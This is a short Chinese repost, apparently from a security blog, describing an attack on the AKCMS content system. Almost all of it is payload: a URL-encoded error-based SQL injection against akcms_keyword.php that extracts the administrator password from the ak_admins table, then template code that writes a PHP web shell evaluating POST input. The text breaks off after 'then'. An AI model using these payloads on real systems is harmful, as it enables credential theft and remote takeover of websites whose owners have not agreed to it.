文章转自:http://www.0x80c.com/?p=56
爆管理员密码:
http://www.xxx.com/akcms_keyword.php?sid=11111%27and
%28select%201%20from%28select%20count%28*%29,concat%28%
28select%20%28select%20%28select%20concat%280x7e,0×27,
password,0×27,0x7e%29%20from%20ak_admins%20limit%200
,1%29%29%20from%20information_schema.tables%20limit%200,
1%29,floor%28rand%280%29*2%29%29x%20from%20informat
ion_schema.tables%20group%20by%20x%29a%29%20and%20%
271%27=%271&keyword=11
模板中写入以下内
<{php}>
fputs(fopen(“./0x80c.php”,”w”),”<?eval($_POST[0x80c]);?>”)
<{/php}>
然后
评论 (0)